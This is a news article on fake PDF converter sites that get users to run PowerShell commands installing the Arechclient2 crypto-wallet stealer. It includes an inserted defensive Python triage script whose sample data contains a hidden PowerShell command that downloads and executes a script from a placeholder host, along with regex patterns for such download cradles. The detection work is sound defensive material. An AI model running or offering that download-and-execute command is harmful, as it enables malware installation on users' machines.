Fake PDF to DOCX Converters Could Steal Your Crypto

  • Cybercriminals have deployed fake PDF converters that secretly install malware designed to steal crypto wallet data
  • The malware, Arechclient2, extracts browser credentials and targets digital asset holders by harvesting wallet information
  • Cybersecurity firm CloudSEK has linked the operation to a broader trend of cyberattacks exploiting the crypto ecosystem’s growing user base

A new malware campaign is using bogus PDF-to-DOCX converters to infiltrate users’ systems and drain their crypto wallets. Cybersecurity firm CloudSEK reports that attackers have mimicked the popular PDFCandy.com website to distribute Arechclient2, a stealthy malware variant that steals browser credentials and cryptocurrency wallet data. The campaign reveals how crypto holders are increasingly being targeted through highly convincing social engineering.

Converting Your Crypto into Their Wallets

The Federal Bureau of Investigation warned last month that agents in its Denver Field Office were increasingly seeing a scam involving free online document converter tools, which prompted CloudSEK to take a closer look. It found that the fraudulent domains — including candyxpdf[.]com and candyconverterpdf[.]com — imitate legitimate document conversion platforms; unlike real converters, however, they instruct users to run suspicious PowerShell commands that install Arechclient2, an infostealer previously used in crypto-related attacks.

Once installed, the malware extracts autofill data, stored browser credentials, and wallet access details — crucial entry points into crypto holdings. The attackers appear to be focusing not just on individual users, but also those interacting with decentralized finance (DeFi) platforms and browser-based wallets like MetaMask.

“Threat actors are now blending technical deception with financial motivation,” CloudSEK noted in its analysis, pointing out the focus on high-value targets like cryptocurrency investors. 

Weaponizing Convenience

By replicating a seemingly harmless file conversion tool, attackers are exploiting a fundamental human weakness: trust in routine services. The fake converters mimic a full user experience, complete with upload progress bars and CAPTCHA challenges, to avoid raising suspicion. Once users input the PowerShell command — under the guise of completing the conversion — their systems become compromised.
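A defender-side triage heuristic for the lure described above: a PowerShell process launched by a human (parent is the desktop shell or a console) whose command line hides its window, bypasses execution policy, or chains a download into execution. This is an added illustration, not code from the CloudSEK report; the process records and the example.invalid URL are constructed, and the indicator names, weights and alert threshold are assumptions.

```python
import re

# Constructed process-creation records in the style of Sysmon Event ID 1 fields.
# None of these are real captures; the URL uses the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/x.ps1 -UseBasicParsing)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\agent.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},
]

# Each regex is one trait of the "paste this command to finish your conversion" lure.
# Names and equal weights are assumptions for this illustration, not vendor signatures.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient|curl)\b.*\b(?:iex|invoke-expression)\b"
        r"|\b(?:iex|invoke-expression)\b.*\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient|curl)\b",
        re.I),
}
# A shell spawned by the desktop shell or a console means a person typed or pasted the
# command, which is exactly how the fake converter gets its payload run.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe", "conhost.exe"}

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def triage(event: dict) -> tuple[int, list[str]]:
    """Score one process-creation record; returns (score, matched indicator names)."""
    if basename(event["Image"]) not in {"powershell.exe", "pwsh.exe"}:
        return 0, []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]
    if basename(event["ParentImage"]) in INTERACTIVE_PARENTS:
        hits.append("interactive_parent")
    return len(hits), hits

def flagged(events: list[dict], threshold: int = 2) -> list[str]:
    """Return the command lines whose indicator count reaches the alert threshold."""
    return [e["CommandLine"] for e in events if triage(e)[0] >= threshold]
```

In the constructed sample only the first record reaches the threshold; the vendor agent's scripted inventory run and the plain cmd.exe launch score zero, which is the separation a SOC rule needs to avoid paging on routine automation.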

The development is part of a wider trend where fake software utilities, especially ones advertised via SEO manipulation or email phishing, have become an increasingly common attack vector in crypto-focused cybercrime.

Survival in the Crypto World Becoming Harder

As digital assets attract both institutional and individual investors, the risk of malware attacks targeting wallet credentials is escalating. CloudSEK’s findings highlight the need for crypto users to rely exclusively on vetted tools and platforms, avoid running any script-based instructions from unknown sources, and adopt strong endpoint protection.

“Malware like Arechclient2 shows that the line between common web activity and financial theft has never been thinner,” CloudSEK warns. Users are urged to double-check URLs, disable PowerShell access if unused, and use hardware wallets where possible.
